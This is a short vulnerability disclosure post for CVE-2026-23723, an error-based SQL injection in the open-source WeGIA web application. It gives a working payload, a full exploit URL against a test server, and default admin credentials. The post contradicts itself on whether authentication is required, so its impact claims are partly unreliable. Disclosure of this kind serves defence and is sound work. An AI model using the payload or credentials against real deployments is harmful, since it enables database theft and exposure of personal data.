Featured image of post CVE-2026-23723
SQL Injection Critical WeGia Security WebApp

CVE-2026-23723

SQL Injection

CVE-2026-23723: SQL Injection (Error-Based) Vulnerability in id_memorando Parameter on Atendido_ocorrenciaControle Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2026-23723

Summary

An authenticated SQL Injection vulnerability was identified in the Atendido_ocorrenciaControle endpoint via the id_memorando parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments.

Details

Vulnerable Endpoint: Atendido_ocorrenciaControle

Parameter: id_memorando

PoC

Payload:

1

1 AND extractvalue(1, concat(0x7e, @@Version))

Example url:

1

https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version))

Steps to Reproduce:

  • Login to the WeGIA system (user:admin, password: wegia) and obtain a valid session cookie.
  • The vulnerability was confirmed on the official security testing server: sec.wegia.org:8000.
  • Send a GET request to the vulnerable endpoint with the following payload:

  • Observe that the system returns a error message, confirming the injection:

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp

Finder

Vinicius Castro

By: CVE-Hunters

© 2020 - 2026 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy